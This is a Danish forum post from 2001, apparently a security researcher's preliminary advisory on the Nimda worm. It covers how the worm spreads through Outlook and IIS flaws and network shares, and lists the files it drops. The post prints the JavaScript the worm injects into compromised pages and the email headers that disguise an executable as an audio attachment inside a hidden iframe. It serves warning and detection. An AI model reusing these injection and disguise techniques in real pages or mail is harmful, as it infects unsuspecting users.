/ Forside / Teknologi / Internet / Sikkerhed / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
Sikkerhed
#NavnPoint
stl_s 37026
arlet 26827
miritdk 20260
o.v.n. 12167
als 8951
refi 8694
tedd 8272
BjarneD 7338
Klaudi 7257
10  molokyle 6481
Alvorlig virus i omløb
Fra : Peter Kruse


Dato : 18-09-01 17:32

Her følger foreløb analyse!

Høj risiko virus i omløb!!

Navn: W32.Nimda.worm
Risiko: HØJ
Oprindelse: ?

W32.Nimda.worm er en høj risiko virus som spreder sig ved at udnytte en
sårbarhed i Outlook (IFrame ). Denne orm er krydsinficerende og udnytter
samtlige kendte sårbarheder, som kan afvikle (remotely) kode på Microsoft
IIS 4.0 og 5.0 (den laver alle tænke GET kommandoer). Derudover spreder den
sig fra inficerede hjemmesider via Iframe sårbarheden som tillader at kode
afvikles automatisk uden interaktion fra brugeren hvis maskinen ikke er
opdateret. Ormen tilføjen følgende streng til hjemmeside som er blevet
kompromitteret: "
<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>". Vi tæller allerede nu
adskillige hundrende danske hjemmesider.

Ormen indeholder teksten: "Concept Virus(CV) V.5, Copyright(C)2001
R.P.China". Det er højest sandsynligt, at den udspringer fra andre kilder
end den indlysende signatur.

Fra private PC'ere sender den sig selv videre til samtlige fortegnelser i
Outlooks adressekartotek ligesom den spreder sig via Netværk shares. Det
sker via SMB/CIFS som "C$" hvor den tilføjer en Guest konto til den lokale
administrator gruppe.

Den dropper derudover mindst 4 filer i mappen:
(root)\Program Files\Common Files\msadc\
root.exe, TFTP129.exe, TFTP68.exe, TFTP192.exe.

En inficeret email vil ankomme med følgende header:


Emne:
Xdesktopdesktopdesktopdesktopsamplesampledesktopsamplesamplesamplesampledesk
topdesktopsamplesampledesktopsamplesampledesktopdesktopsamplesamplesample

MIME-Version: 1.0

Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

Venligst
Peter Kruse
Telia Security- and Virusreseach




 
 
Søg
Reklame
Statistik
Spørgsmål : 177560
Tips : 31968
Nyheder : 719565
Indlæg : 6408943
Brugere : 218888

Månedens bedste
Årets bedste
Sidste års bedste